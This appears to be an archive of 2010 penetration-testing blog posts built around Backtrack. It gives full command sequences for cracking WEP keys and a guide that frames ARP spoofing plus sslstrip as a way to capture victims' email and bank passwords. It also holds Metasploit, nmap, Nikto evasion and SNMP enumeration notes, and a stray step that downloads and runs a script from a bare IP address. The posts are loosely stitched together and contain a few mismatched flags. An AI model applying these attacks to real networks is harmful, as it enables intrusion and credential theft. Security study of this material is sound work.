Saturday, February 13, 2010

WEP Crack no wireless clients

There are many times when a wireless network has no wireless clients associated with it and there are no ARP requests coming from the wired side. This tutorial describes how to crack the WEP key when there are no wireless clients and there are no ARP requests coming from the wired side.


If there ARP requests being broadcast from the wire side, then the standard fake authentication combined with ARP request replay technique may be used.



In this tutorial, here is what was used:
Wireless adaptor Alfa AWUS036H
Backtrack 4



Step 1 - Start the wireless interface in monitor mode on AP channel


 airmon-ng start wlan1 9


Step 2 - Use aireplay-ng to do a fake authentication with the access point


 aireplay-ng -1 0 -e teddy -a 00:14:6C:7E:40:80 -h 00:09:5B:EC:EE:F2 wlan1

-1 means fake authentication
0 reassociation timing in seconds

Or another variation for picky access points:

aireplay-ng -1 6000 -o 1 -q 10 -e teddy -a 00:14:6C:7E:40:80 -h 00:09:5B:EC:EE:F2 wlan1

6000 - Reauthenticate very 6000 seconds. The long period also causes keep alive packets to be sent
-o 1 - Send only one set of packets at a time. Default is multiple and this confuses some APs
-q 10 - Send keep alive packets every 10 seconds.


Troubleshooting Tips
Some access points are configured to only allow selected MAC addresses to associate and connect. If this is the case, you will not be able to successfully do fake authentication unless you know one of the MAC addresses on the allowed list.

If at any time you wish to confirm you are properly associated is to use tcpdump and look at the packets. Start another session and?

tcpdump -n -e -s0 -vvv -i wlan1

Here is a typical tcpdump error message you are looking for:

11:04:34.360700 314us BSSID:00:14:6c:7e:40:80 DA:00:09:5B:EC:EE:F2 SA:00:14:6c:7e:40:80   DeAuthentication: Class 3 frame received from nonassociated station

Notice that the access point (00:14:6c:7e:40:80) is telling the source (00:09:5B:EC:EE:F2) you are not associated. Meaning, the AP will not process or accept the injected packets.

If you want to select only the DeAuth packets with tcpdump then you can use: ?tcpdump -n -e -s0 -vvv -i wlan1 | grep -i DeAuth?. You may need to tweak the phrase ?DeAuth? to pick out the exact packets you want


Step 3 - Use aireplay-ng chopchop or fragmenation attack to obtain PRGA

The objective of the chopchop and fragmentation attacks is to obtain a PRGA (pseudo random generation algorithm) file. This PRGA is not the WEP key and cannot be used to decrypt packets. However, it can be used to create new packets for injection. The creation of new packets will be covered later in the tutorial.

Either chopchop or fragmentation attacks can be to obtain the PRGA bit file. The result is the same so use whichever one works for you.

We will cover the fragmentation technique first. Start another console session and run:

aireplay-ng -5 -b 00:14:6C:7E:40:80 -h 00:09:5B:EC:EE:F2 ath0
-5 means the fragmentation attack

Success! The file ?fragment-0203-180343.xor? can then be used in the next step to generate an arp packet.

If the fragmentation attack was not successful, you can then try the chopchop technique next. Run:

aireplay-ng -4 -h 00:09:5B:EC:EE:F2 -b 00:14:6C:7E:40:80 ath0
-4 means the chopchop attack

Success! The file ?replay_dec-0201-191706.xor? above can then be used in the next step to generate an arp packet.

Helpful Tips
Be sure the packet is 68 or more bytes otherwise you may not have enough PRGA data to subsequently generate a packet. The PRGA captured has to equal or greater then the packet length we want to generate.

At home, to generate some packets to force chopchop to start, ping a nonexistent IP on your network using a wired client. This forces an arp to be broadcast and this will show up in chopchop to be used.


Step 4 - Use packetforge-ng to create an arp packet

In the previous step, we obtained PRGA. It does not matter which attack generated the PRGA, both are equal. This PRGA is stored in the files ending with ?xor?. We can then use this PRGA to generate a packet for injection. We will be generating an arp packet for injection. The objective is to have the access point rebroadcast the injected arp packet. When it rebroadcasts it, a new IV is obtained. All these new IVs will ultimately be used to crack the WEP key.

But first, lets generate the arp packet for injection by entering:

packetforge-ng -0 -a 00:14:6C:7E:40:80 -h 00:09:5B:EC:EE:F2 -k 255.255.255.255 -l 255.255.255.255 -y fragment-0203-180343.xor -w arp-request

-0 means generate an arp packet
-k 255.255.255.255 is the destination IP (most APs respond to 255.255.255.255)
-l 255.255.255.255 is the source IP (most APs respond to 255.255.255.255)
-y fragment-0203-180343.xor is file to read the PRGA from
-w arp-request is name of file to write the arp packet to

The system will respond:

Wrote packet to: arp-request


Step 5 - Start airodump-ng

Open another console session to capture the generated IVs. Then enter:

airodump-ng -c 9 --bssid 00:14:6C:7E:40:80 -w capture ath0
-c 9 is the channel for the wireless network


Step 6 - Inject the arp packet
Using the console session where you generated the arp packet, enter:

aireplay-ng -2 -r arp-request ath0
-2 means use interactive frame selection
-r arp-request defines the file name from which to read the arp packet


Step 7 - Run aircrack-ng to obtain the WEP key

Start another console session and enter:

aircrack-ng -b 00:14:6C:7E:40:80 capture*.cap 
capture*.cap selects all dump files starting with ?capture? and ending in ?cap?.
-b 00:14:6C:7E:40:80 selects the one access point we are interested in

You can run this while generating packets. In a short time, the WEP key will be calculated and presented. Using the PTW method, 40-bit WEP can be cracked with as few as 20,000 data packets and 104-bit WEP with 40,000 data packets. As a reminder, the requirement is that you capture the full packet with airodump-ng. Meaning, do not use the ?--ivs? option.

Friday, February 12, 2010

Simple WEP Crack



Overview

To crack the WEP key for an access point, we need to gather lots of initialization vectors (IVs). Normal network traffic does not typically generate these IVs very quickly. Theoretically, if you are patient, you can gather sufficient IVs to crack the WEP key by simply listening to the network traffic and saving them. Since none of us are patient, we use a technique called injection to speed up the process. Injection involves having the access point (AP) resend selected packets over and over very rapidly. This allows us to capture a large number of IVs in a short period of time.

Equipments used
Wifi Adaptor : Alfa AWUS036H (available in ebay)
Software : Backtrack 4 (Free download from backtrack-linux.org)

Step 1 - Start the wireless interface in monitor mode on AP channel

airmon-ng start wlan1 6
starts wifi interface in channel 6


Step 2 - Test Wireless Device Packet Injection

aireplay-ng -6 -e infosec -a 00:1B:11:24:27:2E  wlan1

-9 means injection
-a 00:1B:11:24:27:2E is the access point MAC address


Step 3 - Start airodump-ng to capture the IVs

airodump-ng -c 6 --bssid 00:1B:11:24:27:2E -w output wlan1

Step 4 - Use aireplay-ng to do a fake authentication with the access point
In order for an access point to accept a packet, the source MAC address must already be associated. If the source MAC address you are injecting is not associated then the AP ignores the packet and sends out a “DeAuthentication” packet in cleartext. In this state, no new IVs are created because the AP is ignoring all the injected packets.


aireplay-ng -1 0 -e infosec -a 00:1B:11:24:27:2E -h 00:c0:ca:27:e5:6a wlan1

-1 means fake authentication
0 reassociation timing in seconds
-e infosec is the wireless network name
-a 00:14:6C:7E:40:80 is the access point MAC address
-h 00:0F:B5:88:AC:82 is our card MAC address


OR

aireplay-ng -1 2 -o 1 -q 10 -e infosec -a 00:1B:11:24:27:2E -h 00:c0:ca:27:e5:6a wlan1

2 - Reauthenticate every 2 seconds. 
-o 1 - Send only one set of packets at a time. Default is multiple and this confuses some APs.
-q 10 - Send keep alive packets every 10 seconds.




Troubleshooting Tips

Some access points are configured to only allow selected MAC addresses to associate and connect. If this is the case, you will not be able to successfully do fake authentication unless you know one of the MAC addresses on the allowed list. If you suspect this is the problem, use the following command while trying to do fake authentication. Start another session and…
Run: tcpdump -n -vvv -s0 -e -i | grep -i -E ”(RA:|Authentication|ssoc)”

You would then look for error messages.

If at any time you wish to confirm you are properly associated is to use tcpdump and look at the packets. Start another session and…
Run: “tcpdump -n -e -s0 -vvv -i wlan1”

Here is a typical tcpdump error message you are looking for:

11:04:34.360700 314us BSSID:00:14:6c:7e:40:80 DA:00:0F:B5:88:AC:82 SA:00:14:6c:7e:40:80   DeAuthentication: Class 3 frame received from nonassociated station

Notice that the access point (00:14:6c:7e:40:80) is telling the source (00:0F:B5:88:AC:82) you are not associated. Meaning, the AP will not process or accept the injected packets.

If you want to select only the DeAuth packets with tcpdump then you can use: “tcpdump -n -e -s0 -vvv -i wlan1 | grep -i DeAuth”. You may need to tweak the phrase “DeAuth” to pick out the exact packets you want.


Step 5 - Start aireplay-ng in ARP request replay mode

aireplay-ng -3 -b 00:1B:11:24:27:2E -h 00:c0:ca:27:e5:6a wlan1


Step 6 - Run aircrack-ng to obtain the WEP key

 aircrack-ng -b 00:1B:11:24:27:2E output*.cap



Wednesday, February 10, 2010

Client side attacks

Client side attack invloves exploiting a weakness in client software such as browser, in order to gain access to a machine.

The victim computer does not have to be routeable or directly accessbile to the attacker. As long as the victim is able to browser to the attacker site, the attack can occur.

Scenario

Victim == Firewall == INTERNET == Attacker

1. The victim browses the attacker's site.
2. Malicious html exploits a browser vulnerability, and executes shellcode.
3. Shellcode is a reverse shell over port 443 to attackers machine.

Client side attacks can come in other forms, such as Microsoft Doc, ppt, xls files which may exploit a vulnerability in ms office. Perhaps one of the nastiest client side bugs was Microsoft GDI heap overflow, which could be triggered by a JPG image file. Sending the vulnerable victim a seemlingly benign JPG would result in code execution on their machine just by viewing (or  previesing) the file.

Install jDownloader

Before starting, be sure you have installed Sun's java.You can install it via :

$ sudo apt-get install sun-java6-bin sun-java6-jre sun-java6-jdk sun-java6-plugin

You can change your default java via :

$sudo update-java-alternatives -s java-6-sun

Ok, now let's download Jdownloader, download it via :

$wget -c http://212.117.163.148/jd.sh

After download let's make it executable and run it :

$chmod +x jd.sh
$./jd.sh

 

Monday, February 8, 2010

metasploit basics

msfconsole


The msfconsole is probably the most popular interface to the MSF. It provides an all-on-one centralized console and allows you efficient access to virtually all of the options available in the Metasploit Framework.

Getting Help

Entering 'help' or a '?' at the msf command prompt will display a listing of available commands along with a description of what they are used for.

msf > help

Tab completion

One of the more useful features of msfconsole is tab completion. As with most other shells, entering what you know and pressing "Tab" will present you with list of options available to you or auto-complete the string if there is only one option.

Show command

Entering 'show' at the msfconsole prompt will display every module within Metasploit

There are number of 'show' commands you can use, but the ones you will use most frequently are 'show auxiliary', 'show exploits', and 'show payloads'

Executing 'show auxiliary' will display a listing of all the available auxiliary modules within metasploit. Auxiliary modules include scanners, deniel of service modules, fuzzers, and more.

msf > show auxiliary

'show exploits' will give a listing of all exploits contained in the framework

msf > show exploits

'show payloads' will display all of the different payloads for all platforms available within Metasploit

msf > show payloads

There are a lot of payloads available. Fortunately, when you are in the context of a particular exploit, running 'show payloads' will only display the payloads that are compatible with that particular exploit. For instance, if it is a Windows exploit, you will not be shown the Linux payloads.

msf exploit(ms08_067_netapi) > show payloads

If you have selected a specific module, you can issue the 'show options' command to display which settings are available and/or required for that specific module.

msf exploit(ms08_067_netapi) > show options

If you aren't certain whether an operating system is vulnerable to a particular exploit, run the 'show targets' command from within the context of an exploit module to see which targets are supported.

msf exploit(ms08_067_netapi) > show targets

If you wish the further fine-tune an exploit, you can see more advanced options by running 'show advanced'

msf exploit(ms08_067_netapi) > show advanced


"search" Command

If you have a general idea of what you are looking for you can search for it via 'search '. In the output below, a search is being made for MS Bulletin MS09-011. The search function will locate this string within the module references.

msf > search ms09-001

"info" Command

The 'info' command will provide detailed information about a particular module including all options, targets, and other information.

msf > info dos/windows/smb/ms09_001_write

"use" Command

When you have decided on a particular module to make use of, issue the 'use' command to select it.

msf > use dos/windows/smb/ms09_001_write

msf auxiliary(ms09_001_write) > show options

"connect" Command

By issuing the 'connect' command with an ip address and port number, you can connect to a remote host from within msfconsole the same as you would with netcat or telnet.

msf > connect 192.168.1.1 23

"set" Command

The 'set' command is used to configure the options and settings of the module you are currently working with.

msf auxiliary(ms09_001_write) > set RHOST 192.168.1.1
RHOST => 192.168.1.1
msf auxiliary(ms09_001_write) > show options

A recently added feature in Metasploit is the ability to set an encoder to use at run-time. This is particularly useful in exploit development when you aren't quite certain as to which payload encoding methods will work with an exploit.

msf exploit(ms08_067_netapi) > show encoders
msf exploit(ms08_067_netapi) > set encoder x86/shikata_ga_nai
encoder => x86/shikata_ga_nai

"check" command

There aren't many exploits that support it, but there is also a 'check' option that will check to see if a target is vulnerable to a particular exploit instead of actually exploiting it.

msf exploit(ms04_045_wins) > show options
msf exploit(ms04_045_wins) > check
Check failed: The connection was refused by the remote host (192.168.1.114:42)

Setting Global Variables

In order to save a lot of typing during a pentest, you can set global variables within msfconsole. You can do this with the 'setg' command. Once these have been set, you can use them in as many exploits and auxiliary modules as you like. You can also save them for use the next time your start msfconsole. However, the pitfall is forgetting you have saved globals, so always check your options before you 'run' or 'exploit'. Conversely, you can use the 'unsetg' command to unset a global variable. In the examples that follow, variables are entered in all-caps (ie: LHOST), but Metasploit is case-insensitive so it is not necessary to do so.

msf > setg LHOST 192.168.1.101
msf > setg RHOSTS 192.168.1.0/24
msf > setg RHOST 192.168.1.136
msf > save

"exploit/run" Commands

When launching an exploit, you issue the 'exploit' command whereas if you are using an auxiliary module, the proper usage is 'run' although 'exploit' will work as well.

msf auxiliary(ms09_001_write) > run

"back" Command

Once you have finished working with a particular module, or if you inadvertently select the wrong module, you can issue the 'back' command to move out of the current context. This, however is not required. Just as you can in commercial routers, you can switch modules from within other modules. As a reminder, variables will only carry over if they are set globally

msf auxiliary(ms09_001_write) > back

How to decrypt https passwords

Description

This tutorial shows how to hack or decrypt ssl (https) passwords, email accounts, bank accounts and other secure sites use ssl for encryption.
for example, i login to my gmail account, and in explore address bar it shows
https://mail.google.com/mail/?shva=1#

if you type paypal.com, it automatically redirects to https://www.paypal.com/mv
any sites which use https, we can decrypt password using ssl.

Before starting the attack.. follow the 2 steps below

1. download backtrack and burn to a dvd, and boot from dvd, and set the ip address

2. Attacking PC and Victim PC needs to be in same network/LAN. If Victim PC is on 192.168.1.0 range
then the attacking PC also needs to be in 192.168.1.0 range.

Steps to hack  email password using sslstrip program


Basically this attack consists of 4 steps.

Step1. Set the attacker machine in IP forwarding mode, so that it can forward all the victims packets to the right address.
#echo 1 > /proc/sys/net/ipv4/ip_forward

Step2. Start arp spoof attack between the victim machine and the gateway, we spoof the arp replies telling the victim machine that MAC address of the gateway is attackers MAC.
#arpspoof -i eth0 -t 192.168.50.5 192.168.50.1
-t is target (victim ip, 192.168.50.5)
192.168.50.1 is the gateway which you want to spoof

To check if arp is running successfully, from client machine ping to clients gateway, 192.168.50.1
and then use command arp -a
you should see attackers and gateway MAC should be same

The image you can see, gateway and attacker PC having same MAC address, 00-16-44-45-7e-c2, that means arp spoof attack is working.

Step3, Setup ip table rule using which will redirect all http traffic from victim pc to port 1000, which sslstrip is listening
open a new console, and type the following command.
#iptables -t nat -A PREROUTING -p tcp --destination-port 80 -j REDIRECT --to-ports 10000


Step3, run sslstrip
#sslstrip -w secret

secret is file name that i want to save the results to a log file
from victim PC, open login to email
now use less secret command to read the log file
search for email address and password

if the log file is too long and if you want to search for a particular user id, use the following command
#less secret
#/infosec.tutorials

infosec.tutorials@gmail.com is the email address i used

Below image of gmail account infosec.tutorials@gmail.com, password field i have removed

Sunday, February 7, 2010

Exploitdb navigation

Updating:

This can be done either in the menu -> Backtrack -> Penetration -> ExploitDB -> Update Exploitdb

Looking for ms08-067
root@bt:/pentest/exploits/exploitdb# ./searchsploit ms08-067

Looking for Apache exploits on Windows platform:

root@bt:/pentest/exploits/exploitdb# ./searchsploit apache windows


Looking for Adobe 9.1.2 exploit and copying it to our root directory and renaming it to adobe:

root@bt:/pentest/exploits/exploitdb# ./searchsploit adobe 9.1.2

nmap commands

1. Nmap Range of IP addressess:
nmap 192.168.0.1-10

2. Nmap Range of ports:
nmap -p 1-1024 192.168.1.1

3. Nmap service version detection:
nmap -sV 192.168.1.1

4. Nmap OS version detection:
nmap -A 192.168.1.1

5. Nmap external script checks
nmap -sC 192.168.1.1

6. Nmap scan without ping check (sometimes ping is blocked but you still want to scan)
nmap -PN 192.168.1.1

7. Nmap scan only scanning known ports (fast scan)
nmap -F 192.168.1.1 

nmap -T Aggressive -sV -0 -v 192.168.1.1
nmap -T Aggressive -sV -P0 192.168.1.1

 

Accessing an SMB Share With Linux Machines

To see which shares are available on a given host, run:
/usr/bin/smbclient -L host

where 'host' is the name of the machine that you wish to view.

The browse list shows other SMB servers with resources to share on the network
To use the client, run:
/usr/bin/smbclient service

where 'service' is a machine and share name. For example, if you are trying to reach a directory that has been shared as 'public' on a machine called zimmerman, the service would be called \\zimmerman\public. However, due to shell restrictions, you will need to escape the backslashes, so you end up with something like this:

/usr/bin/smbclient \\\\zimmerman\\public mypasswd

where 'mypasswd' is the literal string of your password.

You will get the smbclient prompt:

Server time is Sat Aug 10 15:58:44 1996

Timezone is UTC+10.0
Domain=[WORKGROUP] OS=[Windows NT 3.51] Server=[NT LAN Manager 3.51]
smb: \>

Type 'h' to get help using smbclient:
smb: \> h

Install Nessus to Back Track

download nessus and follow the steps to install nessus on backtrack

1. install package using the following command
dpkg -i Nessus-4.2.0-ubuntu810_i386.deb

2. add user to nessus
/opt/nessus/sbin/nessus-adduser

3. register in nessus website and obtain a activation key, and activate your installation

4. Start nessus server
/etc/init.d/nessusd start

5. start client web interface
https://127.0.0.1:8834/

Nikto Web Scanning

== Basic scanning ==
manual
The most basic Nikto scan requires a simply host to target, since port 80 is assumed if none is specified. The host can either be an Ip or a host name of a machine, and is specified using the -h (-host) option. The following will scan the IP 192.168.01 on TCP port 90

perl nikto.pl -h 192.168.0.1

To check on a different port, specifiy the port number with the -p (-port) option

perl nikto.pl -h 192.168.0.1 -p 443

Host, ports, and protocols may also be specified by using a full URL syntax

perl nikto.pl -h https://192.168.0.1:443/

== Multiple Port Testing ==
Nikto can scan multiple ports in the same scanning session. To test more than one port on the same host, specify the list of ports in the -p option. Ports can be specified as range (ie: 80-90), or as a comma-delimited list, (i.e, 80,88,90)

perl nikto.pl -h 192.168.0.1 -p 80,88,443

== Multiple Host Testing ==
Nikto support scanning multiple hosts in the same session via a text file of host names or IPs. Instead of giving a host name or IP for the -h (-host) option, a file name can be given. A file of hosts must be formatted as one host per line, with the port number(s) at the end of each line. Portss can be seperated from the host and other ports via colon or a comma. If no ports specified, port 80 will be assumed.

Example of a valid hosts file
192.168.1.1:80
https://192.168.2.2:8080
192.168.2.2

nikto.pl 192.168.1.1 -e 1 -Display V

A host file may also be an nmap output in "greppable" format (i.e from the output from -oG)

A file may be passed to Nikto through stdout/stdin using "-" as the filename. for example

nmap -p80 192.168.1.1/24 -oG | nikto.pl -h -

== Using a Proxy ==
If the machine running Nikto only has access to the target host (or update server) via an HTTP proxy, the test still can be performed. Set the proxy variable, then execute Nikto with -u (-useproxy) command. All connections will be relayed through the HTTP proxy specified in the configuration file

perl nikto.pl -h 192.168.1.1 -p 80 -u

== Updating ==
Nikto can be automatically updated assuming you have internet connectivity from the host nikto is installed on. To update to the latest plugins and database, simply run the Nikto command with the -update command

perl nikto.pl -update

== All Options ==

Below are all the nikto command line options and explanations.

-Cgidirs
Scan these CGI directories. Special words "none" or "all" may be used to scan all CGI directories or none, (respectively). A literal value for a CGI directory such as "/cgi-test" may be specified (must include trailing slash). If this option is not specified, all CGI directories listed in config.txt will be tested

-config
Specify an alternative config file to use instead of the config.txt located in the install directory.

-dbcheck
Check the scan database for syntax errors

-Display
Control the output that Nikto shows. Use the reference number or letter to specify the type, multiple maybe used

1. Show redirects
2. Show cookies recieved
3. Show all 200/OK responses
4. Show URLs which require authentication
D. Debug output
V. Verbose Output

-evasion
Specify the LibWhisker IDS evasion technique to use. Use the reference number to specify the type, multiple may be used

1. Random URI encoding (non-URF8)
2. Directory self-reference (/./)
3. Premature URL ending
4. Prepend long random string
5. Fake parameter
6. TAB as request spacer
7. Change the case of the URL
8. Use Windows directory seperator (\)


perl nikto.pl -h 192.168.5.103 -evasion 1


-findonly
Only discover the HTTP(S) ports. do not perform a security scan. This will attempt to connect with HTTP or HTTPS, and report the server header.

-Format
Save the outpout file specified with -o(-output) option in this format. If not specified default is "txt". valid formats are
csv - a comma-seperated list
htm - an HTML report
txt - a text report
xml - an XML report

-host
Host(s) to target. can be an IP address, hsotname or text file of hosts.



-id

ID and password to use for host Basic host authentication. Format is "id:password".


-mutate

Specify mutation technique. A mutation will cause Nikto to combine tests or attempt to guess values. These techniques may cause a tremendous amount of tests to be launched against the target. Use the reference number to specify the type, multiple may be used:
1 - Test all files with all root directories
2 - Guess for password file names
3 - Enumerate user names via Apache (/~user type requests)
4 - Enumerate user names via cgiwrap (/cgi-bin/cgiwrap/~user type requests)
5 - Attempt to brute force sub-domain names, assume that the host name is the parent domain
6 - Attempt to guess directory names from the supplied dictionary file


-mutate-options

Provide extra information for mutates, e.g. a dictionary file

-nolookup
Do not perform name lookups on IP addresses.

-nossl
Do not use SSL to connect to the server.

-no404
Disable 404 (file not found) checking. This will reduce the total number of requests made to the webserver and may be preferable when checking a server over a slow link, or an embedded device. This will generally lead to more false positives being discovered.

-output
Write output to the file specified. Format is defined in -F (-Format), default is text. Existing files will have new information appended.

-port
TCP port(s) to target. To test more than one port on the same host, specify the list of ports in the -p (-port) option. Ports can be specified as a range (i.e., 80-90), or as a comma-delimited list, (i.e., 80,88,90). If not specified, port 80 is used.

-Pause
Seconds to delay between each test.

-root
Prepend the value specified to the beginning of every request. This is useful to test applications or web servers which have all of their files under a certain directory.

-ssl
Only test SSL on the ports specified. Using this option will dramatically speed up requests to HTTPS ports, since otherwise the HTTP request will have to timeout first.

-Single
Perform a single request to a target server. Nikto will prompt for all options which can be specified, and then report the detailed output. See Chapter 5 for detailed information.

-timeout
Seconds to wait before timing out a request. Default timeout is 10 seconds.

-useproxy

Use the HTTP proxy defined in the configuration file.

-update
Update the plugins and databases directly from cirt.net.

-Version
Display the Nikto software, plugin and database versions.

-vhost
Specify the Host header to be sent to the target


-Tuning
Tuning options will control the test that Nikto will use against a target. By default, if any options are specified, only those tests will be performed. If the "x" option is used, it will reverse the logic and exclude only those tests. Use the reference number or letter to specify the type, multiple may be used:
0 - File Upload
1 - Interesting File / Seen in logs
2 - Misconfiguration / Default File
3 - Information Disclosure
4 - Injection (XSS/Script/HTML)
5 - Remote File Retrieval - Inside Web Root
6 - Denial of Service
7 - Remote File Retrieval - Server Wide
8 - Command Execution / Remote Shell
9 - SQL Injection
a - Authentication Bypass
b - Software Identification
c - Remote Source Inclusion
x - Reverse Tuning Options (i.e., include all except specified)
The given string will be parsed from left to right, any x characters will apply to all characters to the right of the character.

perl nikto.pl -h 192.168.1.1 -T 58

If an 'x' is passed to -T then this will negate all tests of types following the x. This is useful where a test may check several different types of exploits. For example


perl nikto.pl -h 192.168.1.1 -T 58xb


.

== Mutation Technique ==


A mutation will cause Nikto to combine tests or attempt to guess values. These techniques may cause a tremendous amount of tests to be launched against the target. Use the reference number to specify the type, multiple may be combined.

1. Test all files with all root directories. This takes each test and splits it into a list of files and directories. A scan list is then created by combining each file with each directory.
2. Guess for password file names. Takes a list of common password file names (such as "passwd", "pass", "password") and file extensions ("txt", "pwd", "bak", etc.) and builds a list of files to check for.
3. Enumerate user names via Apache (/~user type requests). Exploit a misconfiguration with Apache UserDir setups which allows valid user names to be discovered. This will attempt to brute-force guess user names. A file of known users can also be supplied by supplying the file name in the -mutate-options parameter.
4. Enumerate user names via cgiwrap (/cgi-bin/cgiwrap/~user type requests). Exploit a flaw in cgiwrap which allows valid user names to be discovered. This will attempt to brute-force guess user names. A file of known users can also be supplied by supplying the file name in the -mutate-options parameter.
5. Attempt to brute force sub-domain names. This will attempt to brute force know domain names, it will assume the given host (without a www) is the parent domain.
6. Attempt to brute directory names. This is the only mutate option that requires a file to be passed in the -mutate-options parameter. It will use the given file to attempt to guess directory names. Lists of common directories may be found in the OWASP DirBuster project.

Backtrack Basic Config

Assign Static IP

ifconfig eth0 192.168.0.4/24
route add default gw 192.168.0.1
echo nameserver 192.168.0. 200 > /etc/resolv.conf

Apache

You can control the apache server using the apachectl stop / start commands

apachectl start

SSHD

The SSH server can be very useful in various situations, such as SSH tunneling SCP file transfer, remote access etc.

Before the SSH server is started for the first time, SSH keys need to be generated.
To start the SSHD server, issue the following command
#sshd-generate

You can verify that the server is up and listening using the netstat command
#netstat -ant | grep 22

Tftpd
A Tftpd server can be useful in situations in which you need to transfer files to or from a victim machine.

To start the tftpd, issue the following command
#atftpd --daemon --port 69 /tmp

Verify if tftpd is running
netstat -anu | grep 69


VNC Server

A VNC Server is useful for remote desktop sharing or for sending remote reverse VNC connections from an attacked machine.

To start the VNC Server simply type vncserver. You will be prompted for a password and VNC server will open on port 5901

netstat -ant | grep 5901

Check what network interfaces you have
#dmesg | grep -i eth

Wireshark Display Filters

Display Filters
Wireshark uses display filters for general packet filtering while viewing and for its coloring rules.

show only SMTP (25) and ICMP traffic
tcp.port eq 25 or icmp

show only traffic in the LAN 192.168.x.x between workstations and servers, no internet
ip.src==192.168.0.0/16 and ip.dst==192.168.0.0/16

TCP buffer full - source is instructing destination to stop sending data
tcp.window_size == 0 && tcp.flags.reset != 1

Sasser worm: what sasser really did
ls_ads.opnum==0x09

Information Gathering Techniques

Information gathering is one of the most important stages of the attack. This is where we gather basic information about our target in order to be able to launch our attack later on.

Google hacking
Searching within a domain
The site: operator restricts the results to website in a given domain.

site: microsoft.com

Lets try the file operator

filetype:pdf site:microsoft.com

Whois reconnaissance

Who is a name for a TCP service, a tool and a database. Whois databases contain nameservers, registrar, and in some cases full contact information about the domain name.

whois checkpoint.com

Whois can also peform reverse lookups, rather than inputting a domain name we can input an IP address. The who is result usually include the whole network range which belongs to the organization/

Open Service Information Gathering

Implementation of various service enumeration methods such as SNMP, SMTP, DNS etc.

#nslookup
> www.checkpoint.com

Identify mail servers belonging to an organization

> set type=mx
> checkpoint.com

identify all the dns servers authoritative for a domain

> set type=ns
> checkpoint.com

Using backtrack tool

#cd /pentest/enumeration/dnsenum/
./dnsenum.pl

SNMP reconnaissance
SNMP is a management protocol and is often used to monitor and remotely configure servers and network devices.

SNMP is based on UDP, a stateless protocol, and is therefore suspectible to IP spoofing. In addition SNMP has a weak authentication system - private (rw) and public (r) community strings. These community strings are passed unencrypted on the network and are often left in their default state "private" and "public"


Let's examine some information from a Windows host running snmp by using the
following command

snmpwalk -c public -v1 1

Let me demonstrate some interesting commands:
snmpwalk -c public -v1 192.168.0.110 SNMPv2-MIB::sysDescr.0

Enumerating windows users.
snmpwalk -c public -v1 192.168.0.110 1.3 |grep 77.1.2.25 |cut -d" " -f4

Enumerating running services
snmpwalk -c public -v1 192.168.0.110 1 |grep hrSWRunName|cut -d" " -f4

Enumerating open tcp ports

snmpwalk -c public -v1 192.168.0.110 1 |grep tcpConnState |cut -d"." -f6 |sort -nu



Enumerating installed softwares
snmpwalk -c public -v1 192.168.0.110 1 |grep hrSWInstalledName


There are lots of other interesting searches we can do. As usual, there are more
specialized tools for this task – I personally like snmpenum.pl and snmpcheck.pl.
You can find them in the /pentest/enumeration/snmpenum

./snmpcheck-1.3.pl -t 192.168.0.110

SMTP reconnaissance

Under certain misconfigurations, mail servers can also be used to gather information about a host / network. SMTP supports several interesting commands such as VRFY and EXPN.
A VRFY request asks the server to verify an email address while EXPN asks the server for the membership of a mailing list. These can often be abused in order to verify existing users on a mail server, which can aid the attacker later.
Let's look at an example:

nc -v 192.168.0.10 25



ARP Spoofing


ARP spoofing is a horrendous attack vector. It is very easy to implement and can have disastrous effects on a local network.
The theory behind ARP spoofing is that since ARP replies are not verified or
checked in any way, an attacker can send a spoofed ARP reply to a victim
machine, thereby poisoning its ARP cache. Once we control the ARP cache, we
can redirect traffic from that machine at will, in a switched environment.

Ettercap

As usual, customized tools have been created for initiating ARP spoofing attacks.
A nice tool to check out for Windows Platforms is Cain and Able, found on
http://www.oxid.it/. This is a powerful tool capable of sniffing, ARP spoofing,
DNS spoofing, password cracking and more.
My favorite ARP spoofing tool is Ettercap. As described by it authors, Ettercap is
a suite for man in the middle attacks (MITM) on the local LAN. It features
sniffing of live connections, content filtering on the fly and many other
interesting tricks. It supports active and passive dissection of many protocols
(even ciphered ones) and includes many features for network and host analysis.
Let's get Ettercap up and running.